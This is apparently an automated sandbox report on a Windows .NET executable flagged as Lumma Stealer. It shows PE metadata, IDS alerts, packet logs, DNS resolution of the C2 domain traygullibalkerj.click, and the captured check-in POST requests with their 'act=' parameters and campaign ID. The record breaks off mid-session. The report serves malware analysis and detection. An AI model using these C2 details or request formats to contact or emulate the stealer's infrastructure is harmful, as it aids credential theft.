add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x117960	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x118000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1159b4	0x115a00	e2645b602f33f69dff0cd5655b0bebbf	False	0.9817895936515083	data	7.9877336038907885	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x118000	0x5b8	0x600	150fd2de5a0df33bf16d88af5c453c7c	False	0.421875	data	4.157713972931305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11a000	0xc	0x200	819fbb653296e4712c144f19b9125e68	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1180a0	0x32c	data			0.4248768472906404
RT_MANIFEST	0x1183cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T23:02:59.297255+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-03T23:02:59.811804+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-03T23:02:59.811804+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.112.1	443	TCP
2025-01-03T23:03:00.467153+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-03T23:03:00.921236+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-03T23:03:00.921236+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.112.1	443	TCP
2025-01-03T23:03:01.598032+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.112.1	443	TCP
2025-01-03T23:03:02.755571+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.112.1	443	TCP
2025-01-03T23:03:03.308259+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49733	104.21.112.1	443	TCP
2025-01-03T23:03:03.832507+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.112.1	443	TCP
2025-01-03T23:03:05.054256+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.112.1	443	TCP
2025-01-03T23:03:06.331896+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.112.1	443	TCP
2025-01-03T23:03:09.549788+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.112.1	443	TCP
2025-01-03T23:03:10.032934+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.112.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 23:02:58.815958023 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:58.815985918 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:58.816051960 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:58.820570946 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:58.820585012 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.297188997 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.297255039 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.303702116 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.303714037 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.303980112 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.346784115 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.395575047 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.395595074 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.395718098 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.811805964 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.811894894 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.811960936 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.826137066 CET	49730	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.826158047 CET	443	49730	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.930829048 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.930857897 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:02:59.930934906 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.938638926 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:02:59.938653946 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.467094898 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.467153072 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.468568087 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.468576908 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.468822956 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.470138073 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.470180035 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.470208883 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921235085 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921278000 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921307087 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921335936 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921365023 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921401024 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921415091 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.921431065 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921466112 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.921916008 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921946049 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921978951 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.921994925 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.922002077 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.922023058 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.926012993 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.926057100 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:00.926064968 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:00.971817970 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.009593964 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.009643078 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.009716034 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.009771109 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.009856939 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.009866953 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.009881020 CET	49731	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.009886026 CET	443	49731	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.125927925 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.125960112 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.126105070 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.126383066 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.126398087 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.597944975 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.598031998 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.599436998 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.599447012 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.599692106 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.601433992 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.601558924 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.601598024 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:01.601680994 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:01.601687908 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.236180067 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.236315012 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.236855984 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.237096071 CET	49732	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.237112999 CET	443	49732	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.256812096 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.256859064 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.256947041 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.257272005 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.257287025 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.755487919 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.755570889 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.763853073 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.763864994 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.764096975 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:02.765516043 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.765728951 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:02.765753031 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.308242083 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.308336020 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.308387995 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.308573008 CET	49733	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.308593035 CET	443	49733	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.364780903 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.364828110 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.364892960 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.365204096 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.365221024 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.832376957 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.832506895 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.833901882 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.833909035 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.834129095 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.835499048 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.835625887 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.835660934 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:03.835735083 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:03.835742950 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:04.437597990 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:04.437683105 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:04.437768936 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:04.437953949 CET	49734	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:04.437968016 CET	443	49734	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:04.590852976 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:04.590873003 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:04.590938091 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:04.591254950 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:04.591265917 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.054167032 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.054255962 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.058257103 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.058267117 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.058506012 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.061810017 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.061909914 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.061916113 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.533801079 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.533900976 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.533965111 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.534132957 CET	49735	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.534148932 CET	443	49735	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.811903000 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.811929941 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:05.812016010 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.812335968 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:05.812347889 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.331821918 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.331896067 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.333143950 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.333153009 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.333374977 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.334513903 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.335226059 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.335249901 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.335365057 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.335385084 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.335494995 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.335520029 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.335642099 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.335659027 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.335793972 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.335827112 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.335968971 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.335993052 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.336000919 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.336009026 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.336138964 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.336163044 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.336184025 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.336287975 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.336308956 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.345177889 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.345320940 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.345349073 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.345351934 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.345385075 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.345390081 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:06.345452070 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:06.350503922 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.052361012 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.052443981 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.052499056 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.052678108 CET	49736	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.052695036 CET	443	49736	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.057851076 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.057882071 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.057974100 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.058270931 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.058284998 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.549659014 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.549787998 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.563673973 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.563688993 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.563910961 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:09.576591015 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.576591015 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:09.576654911 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.032932043 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.032989025 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033016920 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033042908 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033051968 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.033106089 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033143997 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.033221960 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033250093 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033277035 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.033297062 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033365965 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.033663988 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033854961 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.033895969 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.033904076 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.034604073 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.034650087 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.034656048 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.034678936 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.034732103 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.034778118 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.034786940 CET	443	49737	104.21.112.1	192.168.2.4
Jan 3, 2025 23:03:10.034796000 CET	49737	443	192.168.2.4	104.21.112.1
Jan 3, 2025 23:03:10.034801006 CET	443	49737	104.21.112.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 23:02:58.746460915 CET	50951	53	192.168.2.4	1.1.1.1
Jan 3, 2025 23:02:58.808619976 CET	53	50951	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 23:02:58.746460915 CET	192.168.2.4	1.1.1.1	0x3425	Standard query (0)	traygullibalkerj.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 23:02:58.808619976 CET	1.1.1.1	192.168.2.4	0x3425	No error (0)	traygullibalkerj.click	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 23:02:58.808619976 CET	1.1.1.1	192.168.2.4	0x3425	No error (0)	traygullibalkerj.click	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 23:02:58.808619976 CET	1.1.1.1	192.168.2.4	0x3425	No error (0)	traygullibalkerj.click	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 23:02:58.808619976 CET	1.1.1.1	192.168.2.4	0x3425	No error (0)	traygullibalkerj.click	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 23:02:58.808619976 CET	1.1.1.1	192.168.2.4	0x3425	No error (0)	traygullibalkerj.click	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 23:02:58.808619976 CET	1.1.1.1	192.168.2.4	0x3425	No error (0)	traygullibalkerj.click	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 23:02:58.808619976 CET	1.1.1.1	192.168.2.4	0x3425	No error (0)	traygullibalkerj.click	104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

traygullibalkerj.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:02:59 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: traygullibalkerj.click
2025-01-03 22:02:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-03 22:02:59 UTC	1130	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 22:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=asmmm94h2jarofo2jdcp207gqe; expires=Tue, 29 Apr 2025 15:49:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vcOyEMwyNUDbYu1nOGujriIyuRkZ81xWIVTQqYV9FwNFnFTZEbvrSf9a8ZpS0U5egEL%2FeKTPDVnemXgXbiMBGZjNfSSesxu8gkElrgi5SQHuKAj7Ik%2F4ivqnh%2BeAjV3fEyrDO6y00slJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc646b98e31424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4892&min_rtt=1610&rtt_var=2713&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2856&recv_bytes=913&delivery_rate=1813664&cwnd=248&unsent_bytes=0&cid=fc05c7e6d8c0834b&ts=527&x=0"
2025-01-03 22:02:59 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-03 22:02:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.112.1	443	5440	C:\Users\user\Desktop\download.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 22:03:00 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: traygullibalkerj.click
2025-01-03 22:03:00 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 35 35 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=WG6I6S--web55&j=
